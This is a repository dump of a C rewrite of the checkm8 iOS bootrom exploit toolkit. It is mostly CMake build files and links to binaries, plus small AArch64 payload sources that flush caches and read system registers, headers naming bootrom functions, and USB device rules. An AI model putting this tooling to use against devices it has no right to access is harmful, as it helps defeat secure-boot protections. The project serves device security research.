├── CMakeFiles ├── progress.marks ├── checkm8_libusb.dir │ ├── cmake_clean_target.cmake │ ├── checkm8_libusb │ │ └── src │ │ │ ├── io.c.o │ │ │ ├── core.c.o │ │ │ ├── sync.c.o │ │ │ ├── hotplug.c.o │ │ │ ├── strerror.c.o │ │ │ ├── descriptor.c.o │ │ │ └── os │ │ │ ├── linux_udev.c.o │ │ │ ├── poll_posix.c.o │ │ │ ├── linux_usbfs.c.o │ │ │ ├── linux_netlink.c.o │ │ │ └── threads_posix.c.o │ ├── flags.make │ ├── progress.make │ ├── link.txt │ ├── cmake_clean.cmake │ ├── DependInfo.cmake │ ├── depend.internal │ └── C.includecache ├── cmake.check_cache ├── feature_tests.bin ├── 3.10.2 │ ├── CompilerIdC │ │ └── a.out │ ├── CompilerIdCXX │ │ └── a.out │ ├── CMakeDetermineCompilerABI_C.bin │ ├── CMakeDetermineCompilerABI_CXX.bin │ ├── CMakeSystem.cmake │ ├── CMakeASMCompiler.cmake │ ├── CMakeCCompiler.cmake │ └── CMakeCXXCompiler.cmake ├── CMakeDirectoryInformation.cmake ├── TargetDirectories.txt └── feature_tests.c ├── checkm8_payloads ├── CMakeFiles │ ├── progress.marks │ ├── payload_aes.dir │ │ ├── progress.make │ │ ├── link.txt │ │ ├── src │ │ │ └── aes.c.o │ │ ├── cmake_clean.cmake │ │ ├── flags.make │ │ ├── depend.internal │ │ ├── DependInfo.cmake │ │ ├── depend.make │ │ ├── C.includecache │ │ └── build.make │ ├── payload_sync.dir │ │ ├── progress.make │ │ ├── link.txt │ │ ├── src │ │ │ └── sync.c.o │ │ ├── depend.internal │ │ ├── depend.make │ │ ├── cmake_clean.cmake │ │ ├── C.includecache │ │ ├── flags.make │ │ ├── DependInfo.cmake │ │ └── build.make │ ├── payload_sysreg.dir │ │ ├── progress.make │ │ ├── link.txt │ │ ├── src │ │ │ └── sysreg.c.o │ │ ├── depend.internal │ │ ├── depend.make │ │ ├── cmake_clean.cmake │ │ ├── C.includecache │ │ ├── flags.make │ │ ├── DependInfo.cmake │ │ └── build.make │ └── CMakeDirectoryInformation.cmake ├── payload_aes ├── payload_sync ├── payload_sysreg ├── bin │ ├── payload_aes.bin │ ├── payload_sync.bin │ └── payload_sysreg.bin ├── src │ ├── sync.c │ ├── sysreg.c │ └── aes.c ├── include │ ├── util.h │ ├── brfunc_sep.h │ ├── brfunc_timing.h │ ├── brfunc_aes.h │ └── brfunc_common.h ├── CMakeLists.txt └── cmake_install.cmake ├── checkm8_remote ├── CMakeFiles │ ├── progress.marks │ ├── checkm8_remote.dir │ │ ├── main.c.o │ │ ├── src │ │ │ ├── command.c.o │ │ │ ├── exploit.c.o │ │ │ ├── payload.c.o │ │ │ └── libusb_helpers.c.o │ │ ├── progress.make │ │ ├── link.txt │ │ ├── flags.make │ │ ├── cmake_clean.cmake │ │ ├── DependInfo.cmake │ │ ├── depend.internal │ │ ├── depend.make │ │ └── C.includecache │ └── CMakeDirectoryInformation.cmake ├── bin │ ├── payloads │ ├── payload.bin │ └── overwrite.bin ├── checkm8_remote ├── CMakeLists.txt ├── include │ ├── command.h │ ├── payload.h │ ├── checkm8.h │ └── libusb_helpers.h ├── cmake_install.cmake ├── main.c └── src │ ├── exploit.c │ └── payload.c ├── checkm8_libusb └── src │ ├── version_nano.h │ ├── os │ ├── poll_posix.h │ ├── threads_posix.c │ ├── poll_posix.c │ ├── threads_posix.h │ └── linux_usbfs.h │ ├── version.h │ ├── libusb-1.0.rc │ └── hotplug.h ├── .gitignore ├── libcheckm8_libusb.a ├── tools ├── enable_wireshark_usb.sh ├── iphone.rules └── chroot-pi.sh ├── checkm8_arduino ├── include │ ├── User_Setup.h │ └── Usb.h ├── CMakeLists.txt ├── lib │ └── hostshield │ │ ├── sink_parser.h │ │ ├── hexdump.h │ │ ├── parsetools.cpp │ │ ├── printhex.h │ │ ├── message.h │ │ ├── message.cpp │ │ ├── macros.h │ │ ├── parsetools.h │ │ ├── version_helper.h │ │ ├── SPI.cpp │ │ ├── max3421e.h │ │ └── settings.h ├── cmake │ └── ArduinoToolchain.cmake └── src │ └── checkm8_arduino.ino ├── include ├── checkm8_config.h └── libusb_config.h ├── CMakeLists.txt ├── README └── cmake_install.cmake /CMakeFiles/progress.marks: -------------------------------------------------------------------------------- 1 | 24 2 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/progress.marks: -------------------------------------------------------------------------------- 1 | 6 2 | -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/progress.marks: -------------------------------------------------------------------------------- 1 | 18 2 | -------------------------------------------------------------------------------- /checkm8_libusb/src/version_nano.h: -------------------------------------------------------------------------------- 1 | #define LIBUSB_NANO 11402 2 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/* 2 | cmake-build-debug/ 3 | /checkm8_arduino/cmake-build-debug/ 4 | -------------------------------------------------------------------------------- /checkm8_remote/bin/payloads: -------------------------------------------------------------------------------- 1 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/checkm8_payloads/bin -------------------------------------------------------------------------------- /libcheckm8_libusb.a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/libcheckm8_libusb.a -------------------------------------------------------------------------------- /tools/enable_wireshark_usb.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | modprobe usbmon 4 | setfacl -m u:grg:r /dev/usbmon* 5 | -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/cmake_clean_target.cmake: -------------------------------------------------------------------------------- 1 | file(REMOVE_RECURSE 2 | "libcheckm8_libusb.a" 3 | ) 4 | -------------------------------------------------------------------------------- /CMakeFiles/cmake.check_cache: -------------------------------------------------------------------------------- 1 | # This file is generated by cmake for dependency checking of the CMakeCache.txt file 2 | -------------------------------------------------------------------------------- /CMakeFiles/feature_tests.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/feature_tests.bin -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_aes.dir/progress.make: -------------------------------------------------------------------------------- 1 | CMAKE_PROGRESS_1 = 19 2 | CMAKE_PROGRESS_2 = 20 3 | 4 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sync.dir/progress.make: -------------------------------------------------------------------------------- 1 | CMAKE_PROGRESS_1 = 21 2 | CMAKE_PROGRESS_2 = 22 3 | 4 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sysreg.dir/progress.make: -------------------------------------------------------------------------------- 1 | CMAKE_PROGRESS_1 = 23 2 | CMAKE_PROGRESS_2 = 24 3 | 4 | -------------------------------------------------------------------------------- /checkm8_payloads/payload_aes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_payloads/payload_aes -------------------------------------------------------------------------------- /checkm8_payloads/payload_sync: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_payloads/payload_sync -------------------------------------------------------------------------------- /checkm8_payloads/payload_sysreg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_payloads/payload_sysreg -------------------------------------------------------------------------------- /checkm8_remote/bin/payload.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_remote/bin/payload.bin -------------------------------------------------------------------------------- /checkm8_remote/checkm8_remote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_remote/checkm8_remote -------------------------------------------------------------------------------- /checkm8_remote/bin/overwrite.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_remote/bin/overwrite.bin -------------------------------------------------------------------------------- /CMakeFiles/3.10.2/CompilerIdC/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/3.10.2/CompilerIdC/a.out -------------------------------------------------------------------------------- /checkm8_payloads/bin/payload_aes.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_payloads/bin/payload_aes.bin -------------------------------------------------------------------------------- /CMakeFiles/3.10.2/CompilerIdCXX/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/3.10.2/CompilerIdCXX/a.out -------------------------------------------------------------------------------- /checkm8_payloads/bin/payload_sync.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_payloads/bin/payload_sync.bin -------------------------------------------------------------------------------- /checkm8_payloads/bin/payload_sysreg.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_payloads/bin/payload_sysreg.bin -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_aes.dir/link.txt: -------------------------------------------------------------------------------- 1 | /usr/bin/aarch64-linux-gnu-gcc -nostdlib -O CMakeFiles/payload_aes.dir/src/aes.c.o -o payload_aes 2 | -------------------------------------------------------------------------------- /CMakeFiles/3.10.2/CMakeDetermineCompilerABI_C.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/3.10.2/CMakeDetermineCompilerABI_C.bin -------------------------------------------------------------------------------- /CMakeFiles/3.10.2/CMakeDetermineCompilerABI_CXX.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/3.10.2/CMakeDetermineCompilerABI_CXX.bin -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sync.dir/link.txt: -------------------------------------------------------------------------------- 1 | /usr/bin/aarch64-linux-gnu-gcc -nostdlib -O CMakeFiles/payload_sync.dir/src/sync.c.o -o payload_sync 2 | -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/main.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_remote/CMakeFiles/checkm8_remote.dir/main.c.o -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/io.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/io.c.o -------------------------------------------------------------------------------- /checkm8_arduino/include/User_Setup.h: -------------------------------------------------------------------------------- 1 | #ifndef IPWNDFU_REWRITE_C_USER_SETUP_H 2 | #define IPWNDFU_REWRITE_C_USER_SETUP_H 3 | 4 | #endif //IPWNDFU_REWRITE_C_USER_SETUP_H 5 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sysreg.dir/link.txt: -------------------------------------------------------------------------------- 1 | /usr/bin/aarch64-linux-gnu-gcc -nostdlib -O CMakeFiles/payload_sysreg.dir/src/sysreg.c.o -o payload_sysreg 2 | -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/core.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/core.c.o -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/sync.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/sync.c.o -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/hotplug.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/hotplug.c.o -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/strerror.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/strerror.c.o -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/src/command.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_remote/CMakeFiles/checkm8_remote.dir/src/command.c.o -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/src/exploit.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_remote/CMakeFiles/checkm8_remote.dir/src/exploit.c.o -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/src/payload.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_remote/CMakeFiles/checkm8_remote.dir/src/payload.c.o -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/descriptor.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/descriptor.c.o -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_udev.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_udev.c.o -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/poll_posix.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/poll_posix.c.o -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_usbfs.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_usbfs.c.o -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_netlink.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_netlink.c.o -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/threads_posix.c.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xfm00mm/ipwndfu_rewrite_c/HEAD/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/threads_posix.c.o -------------------------------------------------------------------------------- /checkm8_payloads/src/sync.c: -------------------------------------------------------------------------------- 1 | #include "util.h" 2 | 3 | TEXT_SECTION 4 | void _start() 5 | { 6 | __asm__("dmb sy"); 7 | __asm__("ic iallu"); 8 | __asm__("dsb sy"); 9 | __asm__("isb"); 10 | } -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/progress.make: -------------------------------------------------------------------------------- 1 | CMAKE_PROGRESS_1 = 13 2 | CMAKE_PROGRESS_2 = 14 3 | CMAKE_PROGRESS_3 = 15 4 | CMAKE_PROGRESS_4 = 16 5 | CMAKE_PROGRESS_5 = 17 6 | CMAKE_PROGRESS_6 = 18 7 | 8 | -------------------------------------------------------------------------------- /tools/iphone.rules: -------------------------------------------------------------------------------- 1 | SUBSYSTEM=="usb", ATTR{idProduct}=="1227", ATTR{idVendor}=="05ac", MODE="0660", GROUP="grg" 2 | SUBSYSTEM=="usb", ATTRS{idProduct}=="1227", ATTRS{idVendor}=="05ac", MODE="0660", GROUP="grg" 3 | SUBSYSTEM=="usb-serial", MODE="0660", GROUP="grg" 4 | -------------------------------------------------------------------------------- /checkm8_payloads/include/util.h: -------------------------------------------------------------------------------- 1 | #ifndef IPWNDFU_REWRITE_C_UTIL_H 2 | #define IPWNDFU_REWRITE_C_UTIL_H 3 | 4 | #define PAYLOAD_SECTION __attribute__ ((section (".payload_text"))) 5 | #define TEXT_SECTION __attribute__((section (".text"))) 6 | 7 | #endif //IPWNDFU_REWRITE_C_UTIL_H 8 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sync.dir/depend.internal: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o 5 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/sync.c 6 | checkm8_payloads/include/util.h 7 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sysreg.dir/depend.internal: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o 5 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/sysreg.c 6 | checkm8_payloads/include/util.h 7 | -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/flags.make: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | # compile C with /usr/bin/cc 5 | C_FLAGS = 6 | 7 | C_DEFINES = 8 | 9 | C_INCLUDES = -I/home/toor/ipwndfu_rewrite_c/include -I/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src 10 | 11 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sync.dir/depend.make: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o: checkm8_payloads/src/sync.c 5 | checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o: checkm8_payloads/include/util.h 6 | 7 | -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/progress.make: -------------------------------------------------------------------------------- 1 | CMAKE_PROGRESS_1 = 1 2 | CMAKE_PROGRESS_2 = 2 3 | CMAKE_PROGRESS_3 = 3 4 | CMAKE_PROGRESS_4 = 4 5 | CMAKE_PROGRESS_5 = 5 6 | CMAKE_PROGRESS_6 = 6 7 | CMAKE_PROGRESS_7 = 7 8 | CMAKE_PROGRESS_8 = 8 9 | CMAKE_PROGRESS_9 = 9 10 | CMAKE_PROGRESS_10 = 10 11 | CMAKE_PROGRESS_11 = 11 12 | CMAKE_PROGRESS_12 = 12 13 | 14 | -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/link.txt: -------------------------------------------------------------------------------- 1 | /usr/bin/cc -g CMakeFiles/checkm8_remote.dir/main.c.o CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o CMakeFiles/checkm8_remote.dir/src/exploit.c.o CMakeFiles/checkm8_remote.dir/src/payload.c.o CMakeFiles/checkm8_remote.dir/src/command.c.o -o checkm8_remote ../libcheckm8_libusb.a -lpthread -ludev 2 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_aes.dir/cmake_clean.cmake: -------------------------------------------------------------------------------- 1 | file(REMOVE_RECURSE 2 | "CMakeFiles/payload_aes.dir/src/aes.c.o" 3 | "payload_aes.pdb" 4 | "payload_aes" 5 | ) 6 | 7 | # Per-language clean rules from dependency scanning. 8 | foreach(lang C) 9 | include(CMakeFiles/payload_aes.dir/cmake_clean_${lang}.cmake OPTIONAL) 10 | endforeach() 11 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sysreg.dir/depend.make: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o: checkm8_payloads/src/sysreg.c 5 | checkm8_payloads/CMakeFiles/payload_sysreg.dir/src/sysreg.c.o: checkm8_payloads/include/util.h 6 | 7 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sync.dir/cmake_clean.cmake: -------------------------------------------------------------------------------- 1 | file(REMOVE_RECURSE 2 | "CMakeFiles/payload_sync.dir/src/sync.c.o" 3 | "payload_sync.pdb" 4 | "payload_sync" 5 | ) 6 | 7 | # Per-language clean rules from dependency scanning. 8 | foreach(lang C) 9 | include(CMakeFiles/payload_sync.dir/cmake_clean_${lang}.cmake OPTIONAL) 10 | endforeach() 11 | -------------------------------------------------------------------------------- /checkm8_payloads/include/brfunc_sep.h: -------------------------------------------------------------------------------- 1 | #ifndef IPWNDFU_REWRITE_C_BRFUNC_SEP_H 2 | #define IPWNDFU_REWRITE_C_BRFUNC_SEP_H 3 | 4 | #include "brfunc_common.h" 5 | 6 | #define DPA_SEEDED ((BOOTROM_FUNC) ADDR_DPA_SEEDED) 7 | #define SEP_CREATE_SEND_DPA_MESSAGE ((BOOTROM_FUNC) ADDR_SEND_DPA_MESSAGE) 8 | 9 | #endif //IPWNDFU_REWRITE_C_BRFUNC_SEP_H 10 | -------------------------------------------------------------------------------- /checkm8_payloads/src/sysreg.c: -------------------------------------------------------------------------------- 1 | #include "util.h" 2 | 3 | struct sysregs 4 | { 5 | long pt_base; 6 | long evt_base; 7 | }; 8 | 9 | TEXT_SECTION 10 | long long _start() 11 | { 12 | struct sysregs res; 13 | __asm__("mrs %0, ttbr0_el1" : "=r" (res.pt_base)); 14 | __asm__("mrs %0, vbar_el1" : "=r" (res.evt_base)); 15 | 16 | return res.evt_base; 17 | } -------------------------------------------------------------------------------- /checkm8_libusb/src/os/poll_posix.h: -------------------------------------------------------------------------------- 1 | #ifndef LIBUSB_POLL_POSIX_H 2 | #define LIBUSB_POLL_POSIX_H 3 | 4 | #define usbi_write write 5 | #define usbi_read read 6 | #define usbi_close close 7 | #define usbi_poll poll 8 | 9 | int usbi_pipe(int pipefd[2]); 10 | 11 | #define usbi_inc_fds_ref(x, y) 12 | #define usbi_dec_fds_ref(x, y) 13 | 14 | #endif /* LIBUSB_POLL_POSIX_H */ 15 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sysreg.dir/cmake_clean.cmake: -------------------------------------------------------------------------------- 1 | file(REMOVE_RECURSE 2 | "CMakeFiles/payload_sysreg.dir/src/sysreg.c.o" 3 | "payload_sysreg.pdb" 4 | "payload_sysreg" 5 | ) 6 | 7 | # Per-language clean rules from dependency scanning. 8 | foreach(lang C) 9 | include(CMakeFiles/payload_sysreg.dir/cmake_clean_${lang}.cmake OPTIONAL) 10 | endforeach() 11 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sync.dir/C.includecache: -------------------------------------------------------------------------------- 1 | #IncludeRegexLine: ^[ ]*[#%][ ]*(include|import)[ ]*[<"]([^">]+)([">]) 2 | 3 | #IncludeRegexScan: ^.*$ 4 | 5 | #IncludeRegexComplain: ^$ 6 | 7 | #IncludeRegexTransform: 8 | 9 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/sync.c 10 | util.h 11 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/util.h 12 | 13 | checkm8_payloads/include/util.h 14 | 15 | -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/flags.make: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | # compile C with /usr/bin/cc 5 | C_FLAGS = -g -std=gnu99 6 | 7 | C_DEFINES = 8 | 9 | C_INCLUDES = -I/home/toor/ipwndfu_rewrite_c/include -I/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src -I/home/toor/ipwndfu_rewrite_c/checkm8_remote/include 10 | 11 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sysreg.dir/C.includecache: -------------------------------------------------------------------------------- 1 | #IncludeRegexLine: ^[ ]*[#%][ ]*(include|import)[ ]*[<"]([^">]+)([">]) 2 | 3 | #IncludeRegexScan: ^.*$ 4 | 5 | #IncludeRegexComplain: ^$ 6 | 7 | #IncludeRegexTransform: 8 | 9 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/sysreg.c 10 | util.h 11 | /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/util.h 12 | 13 | checkm8_payloads/include/util.h 14 | 15 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_aes.dir/flags.make: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | # compile C with /usr/bin/aarch64-linux-gnu-gcc 5 | C_FLAGS = -nostdlib -O 6 | 7 | C_DEFINES = 8 | 9 | C_INCLUDES = -I/home/toor/ipwndfu_rewrite_c/include -I/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src -I/home/toor/ipwndfu_rewrite_c/checkm8_payloads/include 10 | 11 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sync.dir/flags.make: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | # compile C with /usr/bin/aarch64-linux-gnu-gcc 5 | C_FLAGS = -nostdlib -O 6 | 7 | C_DEFINES = 8 | 9 | C_INCLUDES = -I/home/toor/ipwndfu_rewrite_c/include -I/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src -I/home/toor/ipwndfu_rewrite_c/checkm8_payloads/include 10 | 11 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sysreg.dir/flags.make: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | # compile C with /usr/bin/aarch64-linux-gnu-gcc 5 | C_FLAGS = -nostdlib -O 6 | 7 | C_DEFINES = 8 | 9 | C_INCLUDES = -I/home/toor/ipwndfu_rewrite_c/include -I/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src -I/home/toor/ipwndfu_rewrite_c/checkm8_payloads/include 10 | 11 | -------------------------------------------------------------------------------- /checkm8_payloads/include/brfunc_timing.h: -------------------------------------------------------------------------------- 1 | #ifndef IPWNDFU_REWRITE_C_BRFUNC_TIMING_H 2 | #define IPWNDFU_REWRITE_C_BRFUNC_TIMING_H 3 | 4 | #include "brfunc_common.h" 5 | 6 | #define CLOCK_GATE ((BOOTROM_FUNC) ADDR_CLOCK_GATE) 7 | #define SYSTEM_TIME ((BOOTROM_FUNC) ADDR_SYSTEM_TIME) 8 | #define TIME_HAS_ELAPSED ((BOOTROM_FUNC) ADDR_TIME_HAS_ELAPSED) 9 | 10 | #endif //IPWNDFU_REWRITE_C_BRFUNC_TIMING_H 11 | -------------------------------------------------------------------------------- /CMakeFiles/3.10.2/CMakeSystem.cmake: -------------------------------------------------------------------------------- 1 | set(CMAKE_HOST_SYSTEM "Linux-5.4.6-xanmod4") 2 | set(CMAKE_HOST_SYSTEM_NAME "Linux") 3 | set(CMAKE_HOST_SYSTEM_VERSION "5.4.6-xanmod4") 4 | set(CMAKE_HOST_SYSTEM_PROCESSOR "x86_64") 5 | 6 | 7 | 8 | set(CMAKE_SYSTEM "Linux-5.4.6-xanmod4") 9 | set(CMAKE_SYSTEM_NAME "Linux") 10 | set(CMAKE_SYSTEM_VERSION "5.4.6-xanmod4") 11 | set(CMAKE_SYSTEM_PROCESSOR "x86_64") 12 | 13 | set(CMAKE_CROSSCOMPILING "FALSE") 14 | 15 | set(CMAKE_SYSTEM_LOADED 1) 16 | -------------------------------------------------------------------------------- /include/checkm8_config.h: -------------------------------------------------------------------------------- 1 | #ifndef IPWNDFU_REWRITE_C_CHECKM8_CONFIG_H 2 | #define 